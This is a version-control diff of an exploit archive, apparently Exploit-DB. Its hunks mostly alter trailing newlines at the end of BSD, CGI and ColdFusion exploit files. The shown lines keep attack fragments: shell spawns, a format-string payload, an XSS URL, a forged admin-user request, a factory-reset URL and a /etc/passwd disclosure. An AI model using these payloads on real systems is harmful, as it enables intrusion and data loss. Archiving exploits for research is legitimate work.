main(int argc, char **argv) printf("... try to execute %s manually.\n", argv[1]); return -1; -} +} \ No newline at end of file diff --git a/platforms/bsd/dos/4935.c b/platforms/bsd/dos/4935.c index 9fdbc99a9..82b1acd81 100755 --- a/platforms/bsd/dos/4935.c +++ b/platforms/bsd/dos/4935.c @@ -61,4 +61,4 @@ struct ifreq ifr = { .ifr_name = "lo0" }; return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr); } -// milw0rm.com [2008-01-18] +// milw0rm.com [2008-01-18] \ No newline at end of file diff --git a/platforms/bsd/dos/8163.txt b/platforms/bsd/dos/8163.txt index 1fb253045..71a85cc93 100755 --- a/platforms/bsd/dos/8163.txt +++ b/platforms/bsd/dos/8163.txt @@ -234,4 +234,4 @@ iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q =tXhh -----END PGP SIGNATURE----- -# milw0rm.com [2009-03-05] +# milw0rm.com [2009-03-05] \ No newline at end of file diff --git a/platforms/bsd/dos/8581.txt b/platforms/bsd/dos/8581.txt index 61d1f4040..82ec1bff3 100755 --- a/platforms/bsd/dos/8581.txt +++ b/platforms/bsd/dos/8581.txt @@ -139,4 +139,4 @@ Adrian Portelli of the NetBSD project for his time and permanent suggestions. Kind regards, Rembrandt -# milw0rm.com [2009-04-30] +# milw0rm.com [2009-04-30] \ No newline at end of file diff --git a/platforms/bsd/dos/869.c b/platforms/bsd/dos/869.c index 17f0a23f2..11a1a4ef4 100755 --- a/platforms/bsd/dos/869.c +++ b/platforms/bsd/dos/869.c @@ -146,4 +146,4 @@ shutdown(mysock, 2); return EX_OK; } -// milw0rm.com [2005-03-09] +// milw0rm.com [2005-03-09] \ No newline at end of file diff --git a/platforms/bsd/local/1087.c b/platforms/bsd/local/1087.c index b6cd20c8c..5b198bb38 100755 --- a/platforms/bsd/local/1087.c +++ b/platforms/bsd/local/1087.c @@ -69,4 +69,4 @@ system((char *)path); } } -// milw0rm.com [2005-07-04] +// milw0rm.com [2005-07-04] \ No newline at end of file diff --git a/platforms/bsd/local/118.c b/platforms/bsd/local/118.c index 637504e93..840d668c4 100755 --- a/platforms/bsd/local/118.c +++ b/platforms/bsd/local/118.c @@ -317,4 +317,4 @@ printf("Now exec %s\n",fil); } -// milw0rm.com [2003-11-07] +// milw0rm.com [2003-11-07] \ No newline at end of file diff --git a/platforms/bsd/local/1230.sh b/platforms/bsd/local/1230.sh index 1cd95c84a..7c9f89713 100755 --- a/platforms/bsd/local/1230.sh +++ b/platforms/bsd/local/1230.sh @@ -46,4 +46,4 @@ else echo "Sorry, exploit failed." fi -# milw0rm.com [2005-09-24] +# milw0rm.com [2005-09-24] \ No newline at end of file diff --git a/platforms/bsd/local/125.c b/platforms/bsd/local/125.c index b6fb83f95..d0f507db2 100755 --- a/platforms/bsd/local/125.c +++ b/platforms/bsd/local/125.c @@ -313,4 +313,4 @@ get_proc(pid_t pid, struct kinfo_proc *kp) } -// milw0rm.com [2003-11-19] +// milw0rm.com [2003-11-19] \ No newline at end of file diff --git a/platforms/bsd/local/1311.c b/platforms/bsd/local/1311.c index abe2e202e..4a4dfec98 100755 --- a/platforms/bsd/local/1311.c +++ b/platforms/bsd/local/1311.c @@ -99,4 +99,4 @@ int main() { return 0; } -// milw0rm.com [2005-11-09] +// milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/bsd/local/14406.pl b/platforms/bsd/local/14406.pl index 0bfb041e9..3a44d5f93 100755 --- a/platforms/bsd/local/14406.pl +++ b/platforms/bsd/local/14406.pl @@ -52,4 +52,4 @@ print F $pkt; close(F); print STDERR " d0ne!\n"; -print "Now print it via cupsd!\n"; +print "Now print it via cupsd!\n"; \ No newline at end of file diff --git a/platforms/bsd/local/15206.c b/platforms/bsd/local/15206.c index cc3d3bba8..8f555f190 100755 --- a/platforms/bsd/local/15206.c +++ b/platforms/bsd/local/15206.c @@ -111,4 +111,4 @@ int main(int argc, char **argv) { printf("exploit failed.\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/bsd/local/16951.c b/platforms/bsd/local/16951.c index 528a5517c..b0efa3d7a 100755 --- a/platforms/bsd/local/16951.c +++ b/platforms/bsd/local/16951.c @@ -127,4 +127,4 @@ int main(int argc, char *argv[]) execl("/bin/sh", "sh", NULL); return 0; -} +} \ No newline at end of file diff --git a/platforms/bsd/local/17169.pl b/platforms/bsd/local/17169.pl index 6bec124ca..a7e71e1ca 100755 --- a/platforms/bsd/local/17169.pl +++ b/platforms/bsd/local/17169.pl @@ -25,5 +25,4 @@ pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exi "%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n" . $sc); -exec(@payload); - +exec(@payload); \ No newline at end of file diff --git a/platforms/bsd/local/19545.c b/platforms/bsd/local/19545.c index beb03cd4b..6b3581969 100755 --- a/platforms/bsd/local/19545.c +++ b/platforms/bsd/local/19545.c @@ -45,4 +45,4 @@ Due to insufficient bounds checking on arguments (in this case -C) which are sup ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); - } + } \ No newline at end of file diff --git a/platforms/bsd/local/19726.c b/platforms/bsd/local/19726.c index 34757f75f..b28f5dbef 100755 --- a/platforms/bsd/local/19726.c +++ b/platforms/bsd/local/19726.c @@ -110,4 +110,4 @@ memset(name,'x',sizeof(name)); exit(0); } -} +} \ No newline at end of file diff --git a/platforms/bsd/local/200.c b/platforms/bsd/local/200.c index 41d1bfb26..c919b1da2 100755 --- a/platforms/bsd/local/200.c +++ b/platforms/bsd/local/200.c @@ -32,4 +32,4 @@ int main(int argc,char **argv){ } -// milw0rm.com [2000-11-21] +// milw0rm.com [2000-11-21] \ No newline at end of file diff --git a/platforms/bsd/local/20191.c b/platforms/bsd/local/20191.c index e64d99fe2..42141a3f1 100755 --- a/platforms/bsd/local/20191.c +++ b/platforms/bsd/local/20191.c @@ -109,4 +109,4 @@ unsigned a, *p; chdir((char*)adr); argv[1] = NULL; execv(SCREEN, argv); -} +} \ No newline at end of file diff --git a/platforms/bsd/local/202.c b/platforms/bsd/local/202.c index 2bd3a240e..5d351361f 100755 --- a/platforms/bsd/local/202.c +++ b/platforms/bsd/local/202.c @@ -84,4 +84,4 @@ main() } -// milw0rm.com [2000-11-21] +// milw0rm.com [2000-11-21] \ No newline at end of file diff --git a/platforms/bsd/local/207.c b/platforms/bsd/local/207.c index e964f1061..e0ed75796 100755 --- a/platforms/bsd/local/207.c +++ b/platforms/bsd/local/207.c @@ -36,4 +36,4 @@ int main(int argc,char **argv){ } -// milw0rm.com [2000-11-30] +// milw0rm.com [2000-11-30] \ No newline at end of file diff --git a/platforms/bsd/local/21669.pl b/platforms/bsd/local/21669.pl index 24e3bdd73..2e0815116 100755 --- a/platforms/bsd/local/21669.pl +++ b/platforms/bsd/local/21669.pl @@ -171,5 +171,4 @@ sub watch_crontab last; } exit; -} - +} \ No newline at end of file diff --git a/platforms/bsd/local/22811.c b/platforms/bsd/local/22811.c index 11db34625..ded27e3e7 100755 --- a/platforms/bsd/local/22811.c +++ b/platforms/bsd/local/22811.c @@ -85,6 +85,4 @@ memcpy(buff,"RET=",4); putenv(buff); system("/usr/local/bin/abuse.sdl -datadir $RET"); -} - - +} \ No newline at end of file diff --git a/platforms/bsd/local/23062.c b/platforms/bsd/local/23062.c index 8163b0210..e8e499e9c 100755 --- a/platforms/bsd/local/23062.c +++ b/platforms/bsd/local/23062.c @@ -95,4 +95,4 @@ int main(int argc, char **argv) fflush(pr); pclose(pr); return 0; - } + } \ No newline at end of file diff --git a/platforms/bsd/local/23063.c b/platforms/bsd/local/23063.c index e04777f16..80af0a93b 100755 --- a/platforms/bsd/local/23063.c +++ b/platforms/bsd/local/23063.c @@ -213,4 +213,4 @@ void banner(char *argv0) if(u_r_script_kiddy) bruteforce(start); return 0; -} +} \ No newline at end of file diff --git a/platforms/bsd/local/24113.c b/platforms/bsd/local/24113.c index a609f5b36..77f575d1b 100755 --- a/platforms/bsd/local/24113.c +++ b/platforms/bsd/local/24113.c @@ -129,4 +129,4 @@ int main(int argc, char **argv) banner(); doit(); return (0); -} +} \ No newline at end of file diff --git a/platforms/bsd/local/243.c b/platforms/bsd/local/243.c index 0bb91f3f4..ebc20a8a9 100755 --- a/platforms/bsd/local/243.c +++ b/platforms/bsd/local/243.c @@ -118,4 +118,4 @@ code); } -// milw0rm.com [2001-01-12] +// milw0rm.com [2001-01-12] \ No newline at end of file diff --git a/platforms/bsd/local/286.c b/platforms/bsd/local/286.c index 1667196a8..815b2e623 100755 --- a/platforms/bsd/local/286.c +++ b/platforms/bsd/local/286.c @@ -52,4 +52,4 @@ int main(int argc, char *argv[]) { } -// milw0rm.com [2001-03-03] +// milw0rm.com [2001-03-03] \ No newline at end of file diff --git a/platforms/bsd/local/287.c b/platforms/bsd/local/287.c index e68fb6718..7be68a451 100755 --- a/platforms/bsd/local/287.c +++ b/platforms/bsd/local/287.c @@ -55,4 +55,4 @@ int main(int argc, char *argv[]) { } -// milw0rm.com [2001-03-03] +// milw0rm.com [2001-03-03] \ No newline at end of file diff --git a/platforms/bsd/local/29.c b/platforms/bsd/local/29.c index 0c82617a1..faed70e44 100755 --- a/platforms/bsd/local/29.c +++ b/platforms/bsd/local/29.c @@ -156,4 +156,4 @@ if(selectcode == (char *)&dropcode) } -// milw0rm.com [2003-05-12] +// milw0rm.com [2003-05-12] \ No newline at end of file diff --git a/platforms/bsd/local/30484.c b/platforms/bsd/local/30484.c index a9ebf908a..631eedaa0 100755 --- a/platforms/bsd/local/30484.c +++ b/platforms/bsd/local/30484.c @@ -15,4 +15,4 @@ restoresa = *sa; /* Create child to overwrite *sa after 500k cycles. */ pid = fork_and_overwrite_smp_afterwait(sa, &restoresa, sizeof(restoresa), 500000); -error = bind(sock, sa, sizeof(*sa)); +error = bind(sock, sa, sizeof(*sa)); \ No newline at end of file diff --git a/platforms/bsd/local/3094.c b/platforms/bsd/local/3094.c index 7c9d28a9b..c8120a88d 100755 --- a/platforms/bsd/local/3094.c +++ b/platforms/bsd/local/3094.c @@ -130,4 +130,4 @@ else {usage();} } -// milw0rm.com [2007-01-07] +// milw0rm.com [2007-01-07] \ No newline at end of file diff --git a/platforms/bsd/local/33229.c b/platforms/bsd/local/33229.c index 330aea366..fa4aae777 100755 --- a/platforms/bsd/local/33229.c +++ b/platforms/bsd/local/33229.c @@ -28,4 +28,4 @@ int main(int argc, char **argv) char baguette; signal(SIGABRT, (void (*)(int))&baguette); abort(); -} +} \ No newline at end of file diff --git a/platforms/bsd/local/3578.c b/platforms/bsd/local/3578.c index c676e2f75..dfda6f375 100755 --- a/platforms/bsd/local/3578.c +++ b/platforms/bsd/local/3578.c @@ -49,4 +49,4 @@ int main(){ return 0; } -// milw0rm.com [2007-03-26] +// milw0rm.com [2007-03-26] \ No newline at end of file diff --git a/platforms/bsd/local/36799.c b/platforms/bsd/local/36799.c index 8a55418ad..800cff31c 100755 --- a/platforms/bsd/local/36799.c +++ b/platforms/bsd/local/36799.c @@ -91,4 +91,4 @@ int main(int argc, char **argv) system(argv[1]); // ( o )( o ) panic() puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n"); return 0xDEFECA7E; -} +} \ No newline at end of file diff --git a/platforms/bsd/local/396.c b/platforms/bsd/local/396.c index ddb52dcbd..ae62493b1 100755 --- a/platforms/bsd/local/396.c +++ b/platforms/bsd/local/396.c @@ -124,4 +124,4 @@ strncpy(tmp, p, 20); } -// milw0rm.com [2002-01-01] +// milw0rm.com [2002-01-01] \ No newline at end of file diff --git a/platforms/bsd/local/579.sh b/platforms/bsd/local/579.sh index ab178bf7b..87198b630 100755 --- a/platforms/bsd/local/579.sh +++ b/platforms/bsd/local/579.sh @@ -41,4 +41,4 @@ EOF echo "trying to exploit" PATH=./ "${BMON_EXEC}" -n -# milw0rm.com [2004-10-16] +# milw0rm.com [2004-10-16] \ No newline at end of file diff --git a/platforms/bsd/local/739.c b/platforms/bsd/local/739.c index 7873b8f95..70ecaf388 100755 --- a/platforms/bsd/local/739.c +++ b/platforms/bsd/local/739.c @@ -75,4 +75,4 @@ main(void) system("/bin/bash"); } -// milw0rm.com [2001-07-23] +// milw0rm.com [2001-07-23] \ No newline at end of file diff --git a/platforms/bsd/remote/10035.rb b/platforms/bsd/remote/10035.rb index 8d6765597..d91a82915 100755 --- a/platforms/bsd/remote/10035.rb +++ b/platforms/bsd/remote/10035.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/bsd/remote/105.pl b/platforms/bsd/remote/105.pl index b656f7eb0..009759a32 100755 --- a/platforms/bsd/remote/105.pl +++ b/platforms/bsd/remote/105.pl @@ -43,4 +43,4 @@ print $socket $buf; close($socket); -# milw0rm.com [2003-09-27] +# milw0rm.com [2003-09-27] \ No newline at end of file diff --git a/platforms/bsd/remote/1234.c b/platforms/bsd/remote/1234.c index 158bb7fd7..9251a946e 100755 --- a/platforms/bsd/remote/1234.c +++ b/platforms/bsd/remote/1234.c @@ -480,4 +480,4 @@ int main( int argc, char **argv ) return 0; } -// milw0rm.com [2005-09-26] +// milw0rm.com [2005-09-26] \ No newline at end of file diff --git a/platforms/bsd/remote/18369.rb b/platforms/bsd/remote/18369.rb index 252006b78..cf45b898d 100755 --- a/platforms/bsd/remote/18369.rb +++ b/platforms/bsd/remote/18369.rb @@ -128,4 +128,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/bsd/remote/19520.txt b/platforms/bsd/remote/19520.txt index 0a8d57daf..dd623f583 100755 --- a/platforms/bsd/remote/19520.txt +++ b/platforms/bsd/remote/19520.txt @@ -50,4 +50,4 @@ kcope pts/0 192.168.2.3 6:32PM 4 _su (csh) FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64 -uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) \ No newline at end of file diff --git a/platforms/bsd/remote/20731.c b/platforms/bsd/remote/20731.c index 6a2ff17af..0f652a128 100755 --- a/platforms/bsd/remote/20731.c +++ b/platforms/bsd/remote/20731.c @@ -858,4 +858,4 @@ int main(int argc, char **argv) free(host); return EXIT_SUCCESS; -} +} \ No newline at end of file diff --git a/platforms/bsd/remote/21440.c b/platforms/bsd/remote/21440.c index 0e7b0bc09..4c626e238 100755 --- a/platforms/bsd/remote/21440.c +++ b/platforms/bsd/remote/21440.c @@ -228,4 +228,4 @@ int main(int argc, char **argv) { /* have fun */ printf("now run: dhclient -d -cf dhcp.conf eth0\n"); -} +} \ No newline at end of file diff --git a/platforms/bsd/remote/22131.pl b/platforms/bsd/remote/22131.pl index 3790131c0..332e877f6 100755 --- a/platforms/bsd/remote/22131.pl +++ b/platforms/bsd/remote/22131.pl @@ -200,4 +200,4 @@ EOF } -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/bsd/remote/228.c b/platforms/bsd/remote/228.c index eda7bca20..dac3e2e29 100755 --- a/platforms/bsd/remote/228.c +++ b/platforms/bsd/remote/228.c @@ -244,4 +244,4 @@ while (1) } -// milw0rm.com [2000-12-15] +// milw0rm.com [2000-12-15] \ No newline at end of file diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c index 4bed46335..9fc48f3d1 100755 --- a/platforms/bsd/remote/234.c +++ b/platforms/bsd/remote/234.c @@ -498,4 +498,4 @@ xrecieve(int fd, char *buf, int size) } -// milw0rm.com [2000-12-20] +// milw0rm.com [2000-12-20] \ No newline at end of file diff --git a/platforms/bsd/remote/3491.py b/platforms/bsd/remote/3491.py index bd6276c43..b92c3b465 100755 --- a/platforms/bsd/remote/3491.py +++ b/platforms/bsd/remote/3491.py @@ -163,4 +163,4 @@ class BSD_ICMPv6_Remote_BO: attack = BSD_ICMPv6_Remote_BO() attack.Run() -# milw0rm.com [2007-03-15] +# milw0rm.com [2007-03-15] \ No newline at end of file diff --git a/platforms/bsd/remote/35427.py b/platforms/bsd/remote/35427.py index 591b2e273..d4c92dc89 100755 --- a/platforms/bsd/remote/35427.py +++ b/platforms/bsd/remote/35427.py @@ -145,4 +145,4 @@ except: pass #oh wait :> -time.sleep(5) +time.sleep(5) \ No newline at end of file diff --git a/platforms/bsd/remote/409.c b/platforms/bsd/remote/409.c index 6a12d29f4..ac97ad534 100755 --- a/platforms/bsd/remote/409.c +++ b/platforms/bsd/remote/409.c @@ -874,4 +874,4 @@ x86_nop (unsigned char *dest, unsigned int dest_len, return (walk); } -// milw0rm.com [2001-06-09] +// milw0rm.com [2001-06-09] \ No newline at end of file diff --git a/platforms/bsd/remote/432.c b/platforms/bsd/remote/432.c index eb8944f61..d33a5dcbb 100755 --- a/platforms/bsd/remote/432.c +++ b/platforms/bsd/remote/432.c @@ -418,4 +418,4 @@ main (int argc, char **argv) { root(host); } -// milw0rm.com [2004-09-02] +// milw0rm.com [2004-09-02] \ No newline at end of file diff --git a/platforms/bsd_x86/remote/16880.rb b/platforms/bsd_x86/remote/16880.rb index bef8eb71a..fcdde77b7 100755 --- a/platforms/bsd_x86/remote/16880.rb +++ b/platforms/bsd_x86/remote/16880.rb @@ -139,4 +139,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/14795.c b/platforms/bsd_x86/shellcode/14795.c index a9c30032b..de71f338b 100755 --- a/platforms/bsd_x86/shellcode/14795.c +++ b/platforms/bsd_x86/shellcode/14795.c @@ -105,4 +105,4 @@ int main() { -// the end o.O +// the end o.O \ No newline at end of file diff --git a/platforms/cfm/webapps/16171.py b/platforms/cfm/webapps/16171.py index 1bfeeb1e4..dc02b6282 100755 --- a/platforms/cfm/webapps/16171.py +++ b/platforms/cfm/webapps/16171.py @@ -201,4 +201,4 @@ if __name__ == "__main__": sys.exit(1) doBlindSqlInjection() - print "\n(+) PoC finished." + print "\n(+) PoC finished." \ No newline at end of file diff --git a/platforms/cfm/webapps/16788.rb b/platforms/cfm/webapps/16788.rb index c578cf27f..8e285578f 100755 --- a/platforms/cfm/webapps/16788.rb +++ b/platforms/cfm/webapps/16788.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/cfm/webapps/24081.txt b/platforms/cfm/webapps/24081.txt index bf4ccd14f..9dddcaa32 100755 --- a/platforms/cfm/webapps/24081.txt +++ b/platforms/cfm/webapps/24081.txt @@ -4,4 +4,4 @@ It has been reported that FuseTalk is affected by an administrator command execu This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed by a forum administrator, the attacker supplied command would be carried out with the viewer's privileges. This would occur in the security context of the affected web site and may allow creation of arbitrary users, and other attacks. -http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser +http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser \ No newline at end of file diff --git a/platforms/cfm/webapps/33575.txt b/platforms/cfm/webapps/33575.txt index 3a9eb7b67..9ee8ba273 100755 --- a/platforms/cfm/webapps/33575.txt +++ b/platforms/cfm/webapps/33575.txt @@ -4,4 +4,4 @@ CommonSpot Server is prone to a cross-site scripting vulnerability because the a An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -https://www.example.com/commonspot/utilities/longproc.cfm?onlyurlvars=1&url=%27;--%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E +https://www.example.com/commonspot/utilities/longproc.cfm?onlyurlvars=1&url=%27;--%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/cfm/webapps/36815.txt b/platforms/cfm/webapps/36815.txt index c9c7316c5..d2a0ddd4f 100755 --- a/platforms/cfm/webapps/36815.txt +++ b/platforms/cfm/webapps/36815.txt @@ -26,4 +26,4 @@ Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: -The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/cgi/dos/1157.pl b/platforms/cgi/dos/1157.pl index d9c137215..58fd27432 100755 --- a/platforms/cgi/dos/1157.pl +++ b/platforms/cgi/dos/1157.pl @@ -51,4 +51,4 @@ print "Done, packets sended.\n"; } -# milw0rm.com [2005-08-18] +# milw0rm.com [2005-08-18] \ No newline at end of file diff --git a/platforms/cgi/dos/1175.pl b/platforms/cgi/dos/1175.pl index 993a27222..3eb8d28da 100755 --- a/platforms/cgi/dos/1175.pl +++ b/platforms/cgi/dos/1175.pl @@ -43,4 +43,4 @@ print "currently on: $whyMe \t ($i)\n"; print "Finished creating $numero users"; close($ox); -# milw0rm.com [2005-08-23] +# milw0rm.com [2005-08-23] \ No newline at end of file diff --git a/platforms/cgi/dos/3223.pl b/platforms/cgi/dos/3223.pl index b217c5ed9..32c21115c 100755 --- a/platforms/cgi/dos/3223.pl +++ b/platforms/cgi/dos/3223.pl @@ -62,4 +62,4 @@ foreach my $rec ($db->query("SELECT cn, message FROM chng")->hashes()) { $db->commit(); $db->disconnect(); -# milw0rm.com [2007-01-29] +# milw0rm.com [2007-01-29] \ No newline at end of file diff --git a/platforms/cgi/dos/39073.txt b/platforms/cgi/dos/39073.txt index ef6e16d22..4c8def36e 100755 --- a/platforms/cgi/dos/39073.txt +++ b/platforms/cgi/dos/39073.txt @@ -5,4 +5,4 @@ WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a c Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply -http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply +http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply \ No newline at end of file diff --git a/platforms/cgi/dos/817.pl b/platforms/cgi/dos/817.pl index b8e34a6fe..4ebfa9c2c 100755 --- a/platforms/cgi/dos/817.pl +++ b/platforms/cgi/dos/817.pl @@ -41,4 +41,4 @@ $rp = rand; &ConnectServer; } -# milw0rm.com [2005-02-14] +# milw0rm.com [2005-02-14] \ No newline at end of file diff --git a/platforms/cgi/local/20092.txt b/platforms/cgi/local/20092.txt index 6916a49f6..c52bb995f 100755 --- a/platforms/cgi/local/20092.txt +++ b/platforms/cgi/local/20092.txt @@ -4,5 +4,4 @@ A vulnerability in Big Brother exists which would allow a user to remotely creat ./bb 1.2.3.4 "status evil.php3 " -will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3. - +will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3. \ No newline at end of file diff --git a/platforms/cgi/remote/10028.rb b/platforms/cgi/remote/10028.rb index 76cdc8a28..1ba640c95 100755 --- a/platforms/cgi/remote/10028.rb +++ b/platforms/cgi/remote/10028.rb @@ -95,4 +95,4 @@ DataSegSize=0x4000 disconnect end -end +end \ No newline at end of file diff --git a/platforms/cgi/remote/10037.rb b/platforms/cgi/remote/10037.rb index 08c4b4b59..4047600e6 100755 --- a/platforms/cgi/remote/10037.rb +++ b/platforms/cgi/remote/10037.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/cgi/remote/16780.rb b/platforms/cgi/remote/16780.rb index d6ac17aec..2ff6f3fce 100755 --- a/platforms/cgi/remote/16780.rb +++ b/platforms/cgi/remote/16780.rb @@ -107,4 +107,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 1:014> u 0x5a01d78d L1 ov!OVHelpAPI+0x18d: 5a01d78d ffe4 jmp esp <- jmp esp for 7.53, will update in a sec. -=end +=end \ No newline at end of file diff --git a/platforms/cgi/remote/16795.rb b/platforms/cgi/remote/16795.rb index 916c95dd6..618ae3e5e 100755 --- a/platforms/cgi/remote/16795.rb +++ b/platforms/cgi/remote/16795.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/cgi/remote/18015.rb b/platforms/cgi/remote/18015.rb index d59fdb9cc..629a40a86 100755 --- a/platforms/cgi/remote/18015.rb +++ b/platforms/cgi/remote/18015.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/cgi/remote/1862.c b/platforms/cgi/remote/1862.c index 41e794289..8cd4445a9 100755 --- a/platforms/cgi/remote/1862.c +++ b/platforms/cgi/remote/1862.c @@ -170,4 +170,4 @@ void changeport(char *code, int port, int offset) { *ptr++=(char)(port&0xff); } -// milw0rm.com [2006-06-02] +// milw0rm.com [2006-06-02] \ No newline at end of file diff --git a/platforms/cgi/remote/19713.pl b/platforms/cgi/remote/19713.pl index d47df277f..bf0438fd5 100755 --- a/platforms/cgi/remote/19713.pl +++ b/platforms/cgi/remote/19713.pl @@ -33,4 +33,4 @@ while(<$asoc>) { print STDOUT "\n"; } } -close(ASOC); +close(ASOC); \ No newline at end of file diff --git a/platforms/cgi/remote/19741.pl b/platforms/cgi/remote/19741.pl index 2ff6f292a..8b0907c6c 100755 --- a/platforms/cgi/remote/19741.pl +++ b/platforms/cgi/remote/19741.pl @@ -45,5 +45,4 @@ sub sendraw { print $pstr; my @in=; select(STDOUT); close(S); return @in; - } else { die("Can't connect...\n"); }} - + } else { die("Can't connect...\n"); }} \ No newline at end of file diff --git a/platforms/cgi/remote/19844.txt b/platforms/cgi/remote/19844.txt index dae490dff..7618eb6f6 100755 --- a/platforms/cgi/remote/19844.txt +++ b/platforms/cgi/remote/19844.txt @@ -14,6 +14,4 @@ HTTP/1.0 Host: target Referer: http://target/cgi-bin/bizdb1-search.cgi?bizdb-search (empty line) -(End of Input) - - +(End of Input) \ No newline at end of file diff --git a/platforms/cgi/remote/19909.pl b/platforms/cgi/remote/19909.pl index 4a98479ef..fcab92046 100755 --- a/platforms/cgi/remote/19909.pl +++ b/platforms/cgi/remote/19909.pl @@ -170,4 +170,4 @@ while($input = ) { } close(FILE); # Delete shit -# system("rm -rf $$"); +# system("rm -rf $$"); \ No newline at end of file diff --git a/platforms/cgi/remote/19951.php b/platforms/cgi/remote/19951.php index 9af1b6c85..7912bf476 100755 --- a/platforms/cgi/remote/19951.php +++ b/platforms/cgi/remote/19951.php @@ -78,4 +78,4 @@ print " Data: [$data]\n"; print "\n"; print "

Results of operation:


\n"; print "$raw\n"; -?> +?> \ No newline at end of file diff --git a/platforms/cgi/remote/19995.txt b/platforms/cgi/remote/19995.txt index 7b4eed2d5..db7a42f83 100755 --- a/platforms/cgi/remote/19995.txt +++ b/platforms/cgi/remote/19995.txt @@ -8,6 +8,4 @@ GET /cgi-bin/script.xyz HTTP/1.0 GET /cgi-bin/script.xyz - - - + \ No newline at end of file diff --git a/platforms/cgi/remote/20007.c b/platforms/cgi/remote/20007.c index 72d058fe2..3fc27b7f0 100755 --- a/platforms/cgi/remote/20007.c +++ b/platforms/cgi/remote/20007.c @@ -141,5 +141,4 @@ while((c = getopt(argc, argv, "s:c:")) !=EOF) bcopy(command,&buf[24+strlen(shellcode)],strlen(command)+1); printf(TALKING, buf); -} - +} \ No newline at end of file diff --git a/platforms/cgi/remote/20068.txt b/platforms/cgi/remote/20068.txt index 4aa69d6eb..eb7d99042 100755 --- a/platforms/cgi/remote/20068.txt +++ b/platforms/cgi/remote/20068.txt @@ -4,5 +4,4 @@ 